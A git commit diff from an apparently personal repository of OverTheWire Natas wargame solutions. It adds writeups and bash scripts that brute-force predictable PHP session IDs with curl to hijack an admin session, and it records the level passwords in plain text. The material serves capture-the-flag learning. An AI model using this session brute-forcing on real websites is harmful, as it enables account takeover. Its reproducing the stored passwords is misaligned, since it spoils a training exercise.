<Natas> natas19.sh + writeup

2025-07-16 00:53:52 +10:00 · 2025-07-16 00:53:52 +10:00 · 503a8a0c5c
commit 503a8a0c5c
parent 9cd4fbcbf5
3 changed files with 125 additions and 5 deletions
--- a/overthewire/natas/passwords.md
+++ b/overthewire/natas/passwords.md
@ -72,8 +72,29 @@ natas18: 6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ
 	Another oracle attack using an SQL injection AND this time
 	using a timing based attack.
 	NOTE: see [[#Natas17 Solution Script|Appendix/"Natas17 Solution Script"]]
-natas19:
-natas20:
+natas19: tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr
+  PHP attempts to source `$_SESSION["PHPSESSID"]` from `$_GET`, `$_REQUEST`, and `$_COOKIE`
+  (maybe other's I don't remember exactly). Our session is based solely on
+  `$_COOKIE["PHPSESSID"]` and we know the program specifically uses 0-640 inclusive
+  session ID range. So we can bruteforce this and eventually we'll find
+  a session that is logged in as admin!
+	NOTE: see [[#Natas18 Solution Script|Appendix/"Natas18 Solution Script"]]
+natas20: p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw
+  Same exploit as for natas19 except now the session id isn't monotonic
+  restricted to inclusive range 0-640. Instead its hex encoded UTF-8.
+  Decode it to notice its in the format "<ID>-<USERNAME>" where `<ID>` is
+  the same as for natas19. So we slightly modify our program and done!
+  Also remember from natas19 that the admin user has username `admin`
+  (which narrows down the brute force A LOT). You'll find success for `281-admin`.
+	NOTE: see [[#Natas19 Solution Script|Appendix/"Natas19 Solution Script"]]
+natas21:
+natas22:
+natas23:
+natas24:
+natas25:
+natas26:
+natas27:
+  



@ -390,3 +411,72 @@ get_length
 LENGTH=$?
 exploit_oracle "$LENGTH"
 ```
+
+###### Natas18 Solution Script
+```bash
+#!/usr/bin/env bash
+USERNAME="admin"
+PASSWORD="arbitrary"
+
+req() {
+  SESSION_ID=$1
+  curl http://natas18.natas.labs.overthewire.org/index.php \
+       -X POST \
+       -u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \
+       -d "username=$USERNAME" \
+       -d "password=$PASSWORD" \
+       --cookie "PHPSESSID=$SESSION_ID" \
+       -sS \
+    | grep "Password: "
+}
+
+MIN_ID=0
+MAX_ID=640
+for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
+  printf "Attempt: %2d" $i
+  OUT=$(req "$i")
+  if [ $? -ne 0 ]; then
+    echo -en '\r'
+  else
+    echo " [admin]"
+    echo $OUT | awk '{print substr($2,1,32)}'
+    break
+  fi
+done
+```
+
+###### Natas19 Solution Script
+```bash
+#!/usr/bin/env bash
+
+USERNAME="admin"
+PASSWORD="arbitrary"
+
+req() {
+  local SESSION_ID=$1
+  curl http://natas19.natas.labs.overthewire.org/index.php \
+       -X POST                                             \
+       -u natas19:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr         \
+       -d "username=$USERNAME"                             \
+       -d "password=$PASSWORD"                             \
+       --cookie "PHPSESSID=$SESSION_ID"                    \
+       -sS                                                 \
+    | grep "Password: "
+}
+
+MIN_ID=0
+MAX_ID=640
+for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
+  # encode integer id as hex `$_COOKIE["PHPSESSID"]` format
+  SESSION_ID=$(echo -n "$i-$USERNAME" | od -A n -t x1 | sed 's/ *//g')
+  printf "Attempt: %2d" $i
+  OUT=$(req "$SESSION_ID")
+  if [ $? -ne 0 ]; then
+    echo -en '\r'
+  else
+    echo " [admin]"
+    echo $OUT | awk '{print substr($2,1,32)}'
+    break
+  fi
+done
+```
--- a/overthewire/natas/scripts/natas18.sh
+++ b/overthewire/natas/scripts/natas18.sh
@ -1,12 +1,10 @@
 #!/usr/bin/env bash

-#curl -v --cookie "USER_TOKEN=Yes" http://127.0.0.1:5000/
-
 USERNAME="admin"
 PASSWORD="arbitrary"

 req() {
-  SESSION_ID=$1
+  local SESSION_ID=$1
  curl http://natas18.natas.labs.overthewire.org/index.php \
       -X POST \
       -u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \
--- a/overthewire/natas/scripts/natas19.sh
+++ b/overthewire/natas/scripts/natas19.sh
@ -0,0 +1,32 @@
+#!/usr/bin/env bash
+
+USERNAME="admin"
+PASSWORD="arbitrary"
+
+req() {
+  local SESSION_ID=$1
+  curl http://natas19.natas.labs.overthewire.org/index.php \
+       -X POST                                             \
+       -u natas19:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr         \
+       -d "username=$USERNAME"                             \
+       -d "password=$PASSWORD"                             \
+       --cookie "PHPSESSID=$SESSION_ID"                    \
+       -sS                                                 \
+    | grep "Password: "
+}
+
+MIN_ID=0
+MAX_ID=640
+for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
+  # encode integer id as hex `$_COOKIE["PHPSESSID"]` format
+  SESSION_ID=$(echo -n "$i-$USERNAME" | od -A n -t x1 | sed 's/ *//g')
+  printf "Attempt: %2d" $i
+  OUT=$(req "$SESSION_ID")
+  if [ $? -ne 0 ]; then
+    echo -en '\r'
+  else
+    echo " [admin]"
+    echo $OUT | awk '{print substr($2,1,32)}'
+    break
+  fi
+done